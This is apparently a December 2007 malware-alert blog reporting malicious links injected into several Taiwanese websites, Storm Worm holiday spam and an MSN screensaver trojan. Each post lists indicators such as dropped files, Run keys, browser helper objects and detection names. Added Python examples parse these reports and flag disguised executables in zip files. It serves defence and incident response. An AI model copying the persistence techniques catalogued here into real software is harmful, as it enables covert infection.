December 2007

D-Link (友訊科技) website injected with a malicious link

December 31, 2007 – 10:17:00

Note: a message titled "星光幫演唱會來囉" (announcing a concert by the 星光幫 singers) recently appeared on this site; who knows how many users browsed the site because of it and got infected!

The D-Link (友訊科技) website has been injected with a malicious link. The malware is detected as TSPY_ONLINEG.ISZ/TSPY_GAMPASS.AK/TSPY_LEGMIR.CSF. Anyone who has browsed this site recently should check their computer as soon as possible, and please stay away from the site for now to avoid infection. (Credit: anonymous reader)

The malicious link/code is placed in the home page (other pages may need a careful check too):

Part of this malware exploits a RealPlayer security vulnerability; see CVE-2007-5601 for details.

After execution it behaves as follows:

[Added process]
C:\WINDOWS\system32\wszjdax.exe
C:\WINDOWS\system32\wsmseax.exe
C:\WINDOWS\system32\gjfhazc.exe
C:\WINDOWS\system32\kvdxlis.exe
C:\WINDOWS\system32\gjtmazc.exe
C:\WINDOWS\system32\kvdxslis.exe
C:\WINDOWS\system32\avwlhst.exe
C:\WINDOWS\system32\avwghst.exe
C:\WINDOWS\system32\avzxlst.exe
C:\WINDOWS\system32\kafykaz.exe
C:\WINDOWS\system32\kapjgaz.exe

[DLL injection]
C:\Documents and Settings\Administrator\Local Settings\Temp\LYMANGR.DLL
C:\WINDOWS\136741MM.DLL
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\avwghmn.dll
C:\WINDOWS\system32\avwlhmn.dll
C:\WINDOWS\system32\avzxlmn.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\gjfhayc.dll
C:\WINDOWS\system32\gjtmayc.dll
C:\WINDOWS\system32\kafykzy.dll
C:\WINDOWS\system32\kapjgzy.dll
C:\WINDOWS\system32\kvdxlma.dll
C:\WINDOWS\system32\kvdxslma.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\LotusHlp.dll
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\PTSShell.dll
C:\WINDOWS\system32\SSLDyn.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\wsmsezx.dll
C:\WINDOWS\system32\wszjdzx.dll

[Added service]
NAME: PciHardDisk
DISPLAY: PciHardDisk
FILE: \??\C:\WINDOWS\system32\fat32.sys

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temp\LYLOADER.EXE
C:\Documents and Settings\Administrator\Local Settings\Temp\LYMANGR.DLL
C:\Documents and Settings\Administrator\Local Settings\Temp\MSDEG32.DLL
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\111[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\13[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\18[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\1[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\22[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\3[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\5[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\r[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\10[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\1299644[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\16[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\20[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\24[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\4[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\7[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\Cip[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\dy[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\rl[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\11[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\14[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\19[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\1[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\23[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\6[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\9[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\new232[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\stat[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\014[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\0[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\11[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\17[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\21[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\25[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\2[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\8[1].exe
C:\WINDOWS\136741L.exe
C:\WINDOWS\136741M.exe
C:\WINDOWS\136741MM.DLL
C:\WINDOWS\136741WL.DLL
C:\WINDOWS\AVPSrv.exE
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Fonts\ardaase.fon
C:\WINDOWS\Fonts\ardasbse.fon
C:\WINDOWS\Fonts\avwghinb.dll
C:\WINDOWS\Fonts\avwlhinb.dll
C:\WINDOWS\Fonts\avzxlin.dll
C:\WINDOWS\Fonts\enfeafx.fon
C:\WINDOWS\Fonts\enpobfx.fon
C:\WINDOWS\Fonts\gjfeaxw.fon
C:\WINDOWS\Fonts\gjfhass.dll
C:\WINDOWS\Fonts\gjtmass.dll
C:\WINDOWS\Fonts\gjtoaxw.fon
C:\WINDOWS\Fonts\kafykcsb.dll
C:\WINDOWS\Fonts\kapjgcsb.dll
C:\WINDOWS\Fonts\kvdxlcfb.dll
C:\WINDOWS\Fonts\kvdxslcfb.dll
C:\WINDOWS\Fonts\msguasd.fon
C:\WINDOWS\Fonts\mswuasd.fon
C:\WINDOWS\Fonts\mszhasd.fon
C:\WINDOWS\Fonts\wsmsecjb.dll
C:\WINDOWS\Fonts\wszjdcj.dll
C:\WINDOWS\Fonts\wymoafz.fon
C:\WINDOWS\Fonts\wyzuafz.fon
C:\WINDOWS\Kvsc3.exE
C:\WINDOWS\LotusHlp.exe
C:\WINDOWS\MsIMMs32.exE
C:\WINDOWS\MsPrint32D.exe
C:\WINDOWS\PTSShell.exe
C:\WINDOWS\SSLDyn.exE
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\avwghmn.dll
C:\WINDOWS\system32\avwghst.exe
C:\WINDOWS\system32\avwlhmn.dll
C:\WINDOWS\system32\avwlhst.exe
C:\WINDOWS\system32\avzxlmn.dll
C:\WINDOWS\system32\avzxlst.exe
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\config\sysEventw.cfg
C:\WINDOWS\system32\gjfhayc.dll
C:\WINDOWS\system32\gjfhazc.exe
C:\WINDOWS\system32\gjtmayc.dll
C:\WINDOWS\system32\gjtmazc.exe
C:\WINDOWS\system32\kafykaz.exe
C:\WINDOWS\system32\kafykzy.dll
C:\WINDOWS\system32\kapjgaz.exe
C:\WINDOWS\system32\kapjgzy.dll
C:\WINDOWS\system32\kvdxlis.exe
C:\WINDOWS\system32\kvdxlma.dll
C:\WINDOWS\system32\kvdxslis.exe
C:\WINDOWS\system32\kvdxslma.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\LotusHlp.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\PTSShell.dll
C:\WINDOWS\system32\REGKEY.hiv
C:\WINDOWS\system32\SSLDyn.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\wsmseax.exe
C:\WINDOWS\system32\wsmsezx.dll
C:\WINDOWS\system32\wszjdax.exe
C:\WINDOWS\system32\wszjdzx.dll
C:\WINDOWS\system32\wxptdi.sys
C:\WINDOWS\upxdnd.exe

[Added COM/BHO]
{1C098A56-F90F-A789-901F-8906546720C1}-C:\WINDOWS\system32\gjtmayc.dll
{1D908534-AD45-920F-AC89-4024FA9D26D1}-C:\WINDOWS\system32\gjfhayc.dll
{45679330-4034-9021-7012-909856721374}-C:\WINDOWS\system32\wszjdzx.dll
{792FADFA-BCDE-ACDF-CDEF-21054865CBA7}-C:\WINDOWS\system32\wsmsezx.dll
{7A321487-4977-D98A-C8D5-6488257545A7}-C:\WINDOWS\system32\kapjgzy.dll
{8960356A-458E-DE24-BD50-268F589A56A8}-C:\WINDOWS\system32\avwlhmn.dll
{8A1247C1-53DA-FF43-ABD3-345F323A48D8}-C:\WINDOWS\system32\avwghmn.dll
{BB681598-AD5F-BC8C-77DC-748FAC8D3FBB}-C:\WINDOWS\system32\kafykzy.dll
{C859245F-345D-BC13-AC4F-145D47DA34FC}-C:\WINDOWS\system32\avzxlmn.dll
{CC87A354-ABC3-DEDE-FF33-3213FD7447CC}-C:\WINDOWS\system32\kvdxlma.dll
{CD561258-45F3-A451-F908-A258458226DC}-C:\WINDOWS\system32\kvdxslma.dll

[Added registry]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=SSLDyn
Data=C:\WINDOWS\SSLDyn.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=upxdnd
Data=C:\WINDOWS\upxdnd.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=AVPSrv
Data=C:\WINDOWS\AVPSrv.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=cmdbcs
Data=C:\WINDOWS\cmdbcs.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=WinSysM
Data=C:\WINDOWS\136741M.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=WinSysW
Data=C:\WINDOWS\136741L.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=Kvsc3
Data=C:\WINDOWS\Kvsc3.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=MsPrint32D
Data=C:\WINDOWS\MsPrint32D.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=PTSShell
Data=C:\WINDOWS\PTSShell.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=LotusHlp
Data=C:\WINDOWS\LotusHlp.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=MsIMMs32
Data=C:\WINDOWS\MsIMMs32.exE

As of now (2007/12/31 @ 10:39), the following antivirus products detect these malicious files (for reference only):

To be updated later…
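The behaviour reports on this page ([Added process], [DLL injection], [Added service], [Added file], [Added COM/BHO], [Added registry]) are the indicators a responder actually needs when cleaning a machine that visited one of these sites. The following is an added example, not code from this blog: a parser for that report layout plus a check-list generator that turns each persistence entry (Run value, BHO CLSID, kernel-driver service) into the exact `reg query` / `sc query` location to inspect on a suspect Windows host. SAMPLE is an excerpt of the D-Link report above; the same parser applies to the Storm Worm and other reports further down.

```python
"""Parse the "[Added ...]" behaviour reports on this page into IOC lists.

Added example, not code from the blog: a small parser for the report layout
used above and a check-list generator that maps each persistence entry to
the concrete registry key or service to query. SAMPLE is an excerpt of the
D-Link report on this page.
"""
import re
from collections import defaultdict

SAMPLE = r"""[Added process]
C:\WINDOWS\system32\wszjdax.exe

[Added service]
NAME: PciHardDisk
DISPLAY: PciHardDisk
FILE: \??\C:\WINDOWS\system32\fat32.sys

[Added COM/BHO]
{1C098A56-F90F-A789-901F-8906546720C1}-C:\WINDOWS\system32\gjtmayc.dll
{45679330-4034-9021-7012-909856721374}-C:\WINDOWS\system32\wszjdzx.dll

[Added registry]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=SSLDyn
Data=C:\WINDOWS\SSLDyn.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=upxdnd
Data=C:\WINDOWS\upxdnd.exe
"""

# Section headers appear as "[Added xxx]" (sometimes "[ Added xxx ]") or "[DLL injection]".
SECTION_RE = re.compile(r"^\[\s*(Added [^\]]+?|DLL injection)\s*\]$")
# BHO lines are "{CLSID}-<dll path>".
CLSID_RE = re.compile(r"^(\{[0-9A-Fa-f-]{36}\})-(.+)$")


def parse_report(text):
    """Return {section: [entries]}.

    Registry entries become (key, value, data) tuples, services become dicts
    with name/display/file, BHOs become (clsid, dll path); the process,
    DLL-injection and file sections stay as plain path strings.
    """
    sections = defaultdict(list)
    current, record = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current, record = m.group(1).strip(), {}
            continue
        if current is None or not line:
            continue
        if current == "Added registry":
            if line.startswith("Value="):
                record["value"] = line[len("Value="):]
            elif line.startswith("Data="):
                record["data"] = line[len("Data="):]
            else:
                record = {"key": line}          # a new record starts with its key
            if {"key", "value", "data"}.issubset(record):
                sections[current].append((record["key"], record["value"], record["data"]))
                record = {}
        elif current == "Added service":
            field, _, val = line.partition(":")
            record[field.strip().lower()] = val.strip()
            if {"name", "display", "file"}.issubset(record):
                sections[current].append(dict(record))
                record = {}
        elif current == "Added COM/BHO":
            m = CLSID_RE.match(line)
            if m:
                sections[current].append((m.group(1).upper(), m.group(2)))
        else:
            sections[current].append(line)
    return dict(sections)


def checklist(sections):
    """Map each persistence entry to the exact location to query on a host."""
    items = []
    for key, value, data in sections.get("Added registry", []):
        items.append(f'reg query "{key}" /v {value}   # expect {data}')
    bho_root = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
    for clsid, path in sections.get("Added COM/BHO", []):
        items.append(f'reg query "{bho_root}\\{clsid}"')
        items.append(f'reg query "HKCR\\CLSID\\{clsid}\\InprocServer32"   # expect {path}')
    for svc in sections.get("Added service", []):
        driver = svc["file"].replace("\\??\\", "", 1)   # strip the NT object-manager prefix
        items.append(f"sc query {svc['name']}   # kernel driver {driver}")
    return items


if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for name, entries in parsed.items():
        print(f"{name}: {len(entries)} entries")
    print("\n".join(checklist(parsed)))
```

The BHO entries are worth the two queries each: the `Browser Helper Objects` key is what makes Internet Explorer load the DLL, and `HKCR\CLSID\{…}\InprocServer32` is where the DLL path lives, so a cleanup that removes only one of them leaves either a dangling registration or a DLL that can be re-registered.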

New Storm Worm variant arrives

December 28, 2007 – 10:25:00

In less than a day the Storm Worm authors have again changed the domain name that hosts the malicious download and are spreading a new variant of the worm; please be careful.

The mail subjects (Subject) seen so far are:

A fresh new year
As the new year…
As you embrace another new year
Blasting new year
Happy 2008!
Happy New Year!
It’s the new Year
Joyous new year
New Hope and New Beginnings
New Year Ecard
New Year Postcard
Opportunities for the new year
Wishes for the new year
Happy New Year to You!
Happy New Year to
Lots of greetings on the new year
New Year wishes for You
Dance to the New 2008 Year tune

After execution it behaves as follows (includes stealth behaviour):

[Added service]
NAME: bldy1b60-7eb3
DISPLAY: bldy1b60-7eb3
FILE: \??\C:\WINDOWS\system32\bldy1b60-7eb3.sys

[Added file]
C:\Documents and Settings\Administrator\Desktop\happy-2008.exe
C:\WINDOWS\system32\bldy1b60-7eb3.sys
C:\WINDOWS\system32\bldy_sys.config

As of now (2007/12/27 @ 22:02), the following antivirus products detect these malicious files (for reference only):

bldy_sys.config:
[ Microsoft ], “Backdoor:Win32/Nuwar.B!ini”
happy-2008.exe:
[ Symantec ], “Trojan.Peacomm”
[ McAfee ], “W32/Nuwar@MM”
[ McAfee_Beta ], “W32/Nuwar@MM”
[ Sophos ], “Mal/Dorf-H”
[ Panda_Beta ], “W32/Nuwar.MS.worm”
[ Nod32 ], “Win32/Nuwar.BA worm”
[ Fortinet ], “W32/Tibs.G@mm”
[ HBEDV ], “TR/Crypt.XDR.Gen”
[ Authentium ], “W32/Dropper.gen6”
[ WebWasher ], “Trojan.Crypt.XDR.Gen”
bldy1b60-7eb3.sys:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “Downloader-BAI.sys.gen.a”
[ McAfee_Beta ], “Downloader-BAI.sys.gen.a”
[ CAV ], “Win32/Sintun!generic”
[ Nod32 ], “Win32/Nuwar.BA worm”
[ HBEDV ], “TR/Rootkit.Gen”
[ quickheal ], “Backdoor.Agent.dln”
[ WebWasher ], “Trojan.Rootkit.Gen”

Happy New Year virus arrives

December 26, 2007 – 15:42:00

Recently my mailbox has been receiving spam with Happy New Year messages, but the mail contains a link that downloads the Storm Worm; the downloaded file is named happy-2008.exe. The virus authors are clearly once again exploiting the holiday mood to spread a new Storm Worm variant, so please be careful.

After execution it behaves as follows (includes stealth behaviour):

[Added service]
NAME: init_1c52-26ff
DISPLAY: init_1c52-26ff
FILE: \??\C:\WINDOWS\system32\init_1c52-26ff.sys (random file name)

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\happy-2008[1].exe
C:\WINDOWS\system32\init_1c52-26ff.sys

As of now (2007/12/26 @ 14:41), the following antivirus products detect these malicious files (for reference only):

init_1c52-26ff.sys:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “Downloader-BAI.sys.gen.a”
[ McAfee_Beta ], “Downloader-BAI.sys.gen.a”
[ Alwil ], “Win32:Zhelatin-ASX [Wrm]”
[ Nod32 ], “probably a variant of Win32/Fuclip trojan”
[ HBEDV ], “TR/Rootkit.Gen”
[ Ikarus ], “Backdoor.Win32.Agent.amd”
[ WebWasher ], “Trojan.Rootkit.Gen”
init_sys_config:
[ Microsoft ], “Backdoor:Win32/Nuwar.B!ini”
[ Sophos ], “Troj/Dorfin-Fam”
happy-2008[1].exe:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “W32/Nuwar@MM”
[ McAfee_Beta ], “W32/Nuwar@MM”
[ Alwil ], “Win32:Zhelatin-ASX [Wrm]”
[ Nod32 ], “probably a variant of Win32/Fuclip trojan”
[ HBEDV ], “TR/Rootkit.Gen”
[ Authentium ], “W32/StormWorm.Q”
[ WebWasher ], “Trojan.Rootkit.Gen”
[ bitdefender ], “DeepScan:Generic.Malware.FMH@mmign.893777D0”

Christmas MSN virus

December 26, 2007 – 13:14:00

Yesterday I received a sample sent from a friend's MSN account, named "christmas-2007.zip"; the archive contains a file named "img2007-12.JPEG.scr". Analysis shows it has malicious behaviour, so please be careful.

After execution it behaves as follows:

[Added process]
C:\WINDOWS\servidevice.exe

[Added file]
C:\WINDOWS\Chirstmas-2007.zip
C:\WINDOWS\servidevice.exe

[Added registry]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=ryan1918
Data=servidevice.exe

As of now (2007/12/25 @ 13:58), the following antivirus products detect these malicious files (for reference only):

Chirstmas-2007.zip/img2007-12.JPEG.scr:
[ Nod32 ], “Win32/IRCBot.ABP trojan”
[ Fortinet ], “suspicious”
[ Rising ], “Backdoor.Win32.PBot.b”
[ Ikarus ], “Trojan-Downloader.Win32.Banload.ams”
[ Authentium ], “W32/Document-disguised-based!Maximus”
[ WebWasher ], “BlockReason.46 (suspicious)”
servidevice.exe:
[ Nod32 ], “Win32/IRCBot.ABP trojan”
[ Fortinet ], “suspicious”
[ Rising ], “Backdoor.Win32.PBot.b”
[ Ikarus ], “Trojan-Downloader.Win32.Banload.ams”
[ Authentium ], “W32/Document-disguised-based!Maximus”
[ WebWasher ], “BlockReason.46 (suspicious)”
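The sample above relies on a double extension: Windows Explorer hides known extensions by default, so "img2007-12.JPEG.scr" is shown as "img2007-12.JPEG" and opens as a screen-saver executable. The following is an added example, not code from the original post: it inspects every member of a zip archive and flags names whose real (last) extension is executable behind an image/document decoy, and members whose bytes start with a PE "MZ" header despite a non-executable name. The archive is constructed in memory so the check runs offline; the member names follow the post, the contents are dummy bytes.

```python
"""Spot disguised executables in an archive, like img2007-12.JPEG.scr above.

Added example, not code from the original post. The archive is built in
memory with dummy contents so the check runs offline.
"""
import io
import zipfile

EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}
DECOY_EXT = {".jpg", ".jpeg", ".gif", ".png", ".bmp", ".doc", ".pdf", ".txt"}


def extensions(name):
    """All extensions of the base name, lower-cased: 'a/img.JPEG.scr' -> ['.jpeg', '.scr']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return ["." + p for p in base.split(".")[1:]]


def classify(name, head):
    """Return the reasons a member looks disguised (empty list = nothing found)."""
    exts = extensions(name)
    reasons = []
    if exts and exts[-1] in EXEC_EXT:
        reasons.append(f"executable extension {exts[-1]}")
        if len(exts) >= 2 and exts[-2] in DECOY_EXT:
            reasons.append(f"decoy extension {exts[-2]} in front of it")
    elif head[:2] == b"MZ":
        # PE image (exe/dll/scr) whose name does not admit to being executable
        reasons.append("PE header under a non-executable name")
    return reasons


def scan_zip(data):
    """Map member name -> reasons, for every suspicious member of a zip archive."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)   # only the signature bytes are needed
            reasons = classify(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample():
    """Constructed archive mirroring the christmas-2007.zip layout (dummy contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("img2007-12.JPEG.scr", b"MZ" + b"\x00" * 62)   # fake PE stub
        zf.writestr("readme.txt", b"season's greetings")
        zf.writestr("photo.jpg", b"MZ" + b"\x00" * 62)            # PE bytes, image name
        zf.writestr("real.jpg", b"\xff\xd8\xff\xe0")              # genuine JPEG magic
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample()).items():
        print(member, "->", "; ".join(reasons))
```

Reading only the first two bytes of each member keeps the scan cheap on large archives; a mail gateway or IM proxy would apply the same `classify` to the attachment name and header before the user ever sees a "JPEG" that is really a screen saver.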

北軟股份有限公司 website injected with a malicious link

December 26, 2007 – 10:25:00

Note: this malicious link has been on the company's web pages for many days and they still have not dealt with it; presumably many people have been infected.

The 北軟股份有限公司 website has been injected with a malicious link. The malware is TROJ_SMALL.DXW. Anyone who has browsed this site recently should check their computer as soon as possible, and please stay away from the site for now to avoid infection. (Credit: anonymous reader)

The malicious link/code is placed in the home page (other pages have it too, so they may need a careful check):

This malware exploits a RealPlayer security vulnerability; see CVE-2007-5601 for details.

As of now (2007/12/24 @ 16:24), the following antivirus products detect these malicious files (for reference only):

6.gif:
[ Trend ], “JS_REALPLAY.J”
ads.jpg.exe:
[ Trend ], “TROJ_SMALL.DXW”
web.exe:
[ Trend ], “TROJ_ALMANAHE.AC”
1.gif:
[ Trend ], “JS_AGENT.AEVS”

高雄市觀光協會 (Kaohsiung City Tourism Association) website injected with a malicious link

December 12, 2007 – 17:33:00

The 高雄市觀光協會 website has been injected with a malicious link. The malware is PWS:Win32/Gamania.gen!B. Anyone who has browsed this site recently should check their computer as soon as possible, and please stay away from the site for now to avoid infection.

The malicious link/code is placed in the home page and in index-down.asp (other pages may need a careful check too):

After execution it behaves as follows:

[DLL injection]
C:\WINDOWS\Help\9712499B91DB.DLL

[Added file]
C:\autorun.inf
C:\Documents and Settings\Administrator\Desktop\2.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\~s.bat
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\m[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\gmsex[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\h[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\stat[1].htm
C:\shell.exe
C:\WINDOWS\Help\9712499B91DB.DLL
C:\WINDOWS\Help\9712499B91DB.EXE
C:\WINDOWS\Help\autorun.inf

[Added COM/BHO]
{6B12A5F5-CABF-41EE-B8B3-EC5D2AAFF132}-C:\WINDOWS\HELP\9712499B91DB.DLL

As of now (2007/12/12 @ 16:04), the following antivirus products detect these malicious files (for reference only):

9712499B91DB.DLL:
[ Trend ], “Possible_Infostl”
9712499B91DB.EXE:
[ IntelliTrap ], “PAK_Generic.001”
[ Alpha_Gen ], “Possible_Mlwr-13”
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]”
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14”
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”
autorun.inf:
[ Beta_Gen ], “Possible_Otorun1″
[ Ikarus ], “Trojan-PWS.OnlineGames.NIT”
[ bitdefender ], “Trojan.PWS.OnLineGames.NIT”
gmsex[1].exe:
[ IntelliTrap ], “PAK_Generic.001”
[ Alpha_Gen ], “Possible_Mlwr-13”
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]”
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14”
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”
h[1].htm:
[ Alpha_Gen ], “Heur_Infrm-1″
[ Sophos ], “Mal/Iframe-A”
[ HBEDV ], “HEUR/Exploit.HTML”
[ Norman ], “Trojan HTML/Exploit!IFrame.G”
m[1].htm:
[ McAfee ], “Exploit-ObscuredHtml”
[ McAfee_Beta ], “Exploit-ObscuredHtml”
[ HBEDV ], “HTML/ADODB.Exploit.Gen”
[ Grisoft ], “Virus found JS/Downloader.Agent”
[ WebWasher ], “Script.ADODB.Exploit.Gen”
shell.exe:
[ IntelliTrap ], “PAK_Generic.001”
[ Alpha_Gen ], “Possible_Mlwr-13”
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]”
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14”
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”

台安醫院 (Taiwan Adventist Hospital) website injected with a malicious link again

December 12, 2007 – 16:23:00

Note: this site has carried the malicious link for a long time with no sign of it being fixed; if you still visit it, you do so at your own risk.

The 台安醫院 website has again been injected with a malicious link. The malware is Trojan W32/Lineage.AYTD. Anyone who has browsed this site recently should check their computer as soon as possible, and please stay away from the site for now to avoid infection.

The malicious link/code is placed in the home page (other pages may need a careful check too):

After execution it behaves as follows:

[DLL injection]
C:\WINDOWS\Web\printers\images\ndmai.dll

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\717[1].c
